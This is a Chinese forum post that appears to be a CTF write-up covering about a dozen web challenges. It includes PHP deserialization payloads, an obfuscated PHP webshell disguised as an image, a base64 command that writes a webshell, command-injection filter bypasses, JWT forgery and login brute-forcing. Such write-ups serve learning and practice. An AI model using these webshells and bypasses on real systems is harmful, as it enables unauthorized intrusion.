马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?立即注册
x
Cookie_Factory
扫扫目录
在app.js文件中发现了一个有意思的东西
LovePopChain
打开环境发现给了一串php源码,拷贝到本地进行分析。
发现@unserialize,又找到__wakeup(),尝试构造序列化。
分析其链,@unserialize优先触发__wakeup(),而入口是__clone()中的eval()
执行__clone()需要Myobject对象中的__invoke(),
__invoke() // 当尝试以调用函数的方式调用一个对象时,该方法会被主动调用。
发现hybcx对象中的__toString()魔术方法中的$this->Si最有大概。而MyObject中的Nolove="Do_You_Want_Fl4g?"可以触发该方法。
分析完开始尝试构造序列化。
$a=new MyObject();
$b=new hybcx();
$b ->Si = $a;
$a ->NoLove = $b;
echo serialize($a);
$a = new MyObject();
$b = new hybcx();
$b->Si=$a;
$a->NoLove = $b;
echo serialize($a);
大概就是如许。运行后得到
O:8:"MyObject":2:{s:6:"NoLove";O:5:"hybcx":2:{s:6:"JiuYue";N;s:2:"Si";r:1;}s:6:"Forgzy";N;}
参数中的.会被过滤掉,只要将_换成[后,[会被转义成_,而背面的就会被忽略
Post传入参数
发现了flag
RedFlag
这里建议去看BUUCTF SSTI模板注入 - 高人于斯 - 博客园这里的文章,有原题
babyupload
进行目录扫描
获得上传路径
尝试上传图片马,提示马没了,多次尝试,发现对eval,system,passthru,assert进行了过滤,尝试进行构造绕过
??_x0010_JFIF
<?=$a='sys';$b='tem';$funcName=$a.$b;$x='funcName';$$x($_REQUEST[1]);?>
获得路径
尝试上传.htacces,发现克制上传,尝试绕过,使用111.htacces.jpg上传,抓包,修改后乐成
尝试访问
尝试使用base64输入
echo " D89ZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTs/Pg=="|base64 -d>222.php(一句话木马)
flag藏在环境变量中,打开终端输入env,获得flag
我写的网站被rce了?
每个按钮测试一次,发现更新软件,备份日记,检察日记,检察历程功能开发完成,其他都体现功能正在开发
对其挨个抓包检察,测试
更新软件:日记备份,参数测试相应大小相同
测试日记检察时,相应长度发生差别,检察,发现报错信息,尝试在此处进行rce
此时尝试参数1,发现数字被过滤,体现hacker,尝试xxx,发现报错,但是ls和.log拼接了,所以ls后也||隔开
乐成ls
尝试判定过滤字符
空格过滤,使用$IFS绕过
Cat过滤,加’数字’过滤,换成字母正常
Flag过滤,``继续绕过,/目录下发现flag
find-the-id
输入1,用yakit进行抓包,对参数进行fuzz,发现有一个相应大小与其他差别,检察,发现flag
tflock
扫目录
发现robots.txt
获得密码本,然后从ctferpass里登录进去获得了一个登录后的路径
然后就是抓包测试,但是鉴于之前先输入username,再输入password会爆锁
所以就先爆破密码,互换其位置,开始爆破
乐成出现flag
ps:假如不可的话,就把login.php变为login.php/admin.php
纯净环境下进行爆破,假如账户已经锁定,爆破的时候还是锁定的!!!!!!!(留意)
刮刮乐
进去啥都没有,检查提示传参cmd
传入参数cmd后,发现在页面最下方提示我不是百度本身人
但是页面看着太不舒服了,果断禁用js
添加referer和xff后,居然没有页面提示了
直接尝试
Why_so_serials?
给了一串php代码,拷下来看看
发现反序列化
发现字符替换
考虑反序列化字符逃逸
分析代码发现,触发flag体现需要crime的值为真,将代码中crime的值改为true,执行反序列化操作,得到要逃逸的字符串
“;s:5:"crime";b:1;} 共记19个字符,
然后joker替换batman后会溢出一个字符,也就是说末了构造的时候需要19个joker
检察GET传参Bruce,发现没有对此做要求,随便传一个值,末了payload
?Bruce=1&Wayne=jokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjoker";s:5:"crime";b:1;}
获得flag
eazyl0gin
给了个登录框提示
下载附件,检察js文件
先去解密下密码
然后就对账号进行研究,因为提到了UpperCase(),去看看这是什么东西
瞥见是Nodejs,点进去看看
尝试使用buıldctf/012346登陆,发现flag
ez_md5
瞥见这个输入框,直接尝试了万能密码ffifdyop,直接就乐成了
一开始只瞥见了下面这个,传了两个相等md5的数字进去,但是居然还体现不可以
后来突然瞥见这个Request,想到request会和cookie有关,尝试修改cookie的值为1
果然这里就绕过了
这里的post传参,之间拿到网站去解密了
传入这个,居然还让我再想想,明明都传完了啊啊啊!!!
瞥见_了,这不就又是谁人可恶的瞥见.主动换成_吗,直接[绕过。
哈哈哈获得flag
等我写wp的时候发现了
ez_waf
上传文件,发现过滤很严格
但是允许上传php文件
进行fuzz,看过滤哪些关键词
发现<> eval system,字符加等号等都被过滤,看来进行绕过是基本不大概了
考虑扔一堆垃圾数据进行溢出
获得flag
sub
先检察源码,发现和jwt有关,给了密钥
一些关键信息
这里要求用户是admin
起首注册用户admin,然后根据login的关键信息进行jwt 伪造
这里一开始时间戳我复制了当前时间的时间戳,在检察页面的时候爆了Token has expired
回去检察源码发现要30分钟后,直接伪造了个久远的时间
抓包page页面,把Cookie伪造
乐成访问
进行使用
隔断
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |